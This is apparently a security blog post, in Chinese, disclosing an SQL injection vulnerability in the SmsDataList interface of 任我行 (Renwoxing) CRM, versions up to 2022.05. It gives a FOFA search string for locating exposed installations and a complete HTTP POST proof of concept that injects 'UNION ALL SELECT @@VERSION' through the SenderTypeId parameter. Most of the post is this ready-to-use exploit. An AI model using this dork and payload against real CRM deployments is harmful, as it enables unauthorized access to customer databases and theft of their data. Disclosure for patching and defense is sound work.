任我行CRM系统SmsDataList接口SQL注入漏洞

漏洞概述
—-

SmsDataList接口存在SQL注入漏洞

影响范围
—-
测试≤2022.05都存在,以上未测试
![2024-01-05T08:17:35.png][1]

复现环境
—-

FOFA语法:

“欢迎使用任我行CRM”

漏洞复现
—-

>PoC

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

SenderTypeId=0′ UNION ALL SELECT @@VERSION —

![2024-01-05T08:18:48.png][2]

[1]: https://www.mhtsec.com/usr/uploads/2024/01/37273309.png
[2]: https://www.mhtsec.com/usr/uploads/2024/01/3669446378.png

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容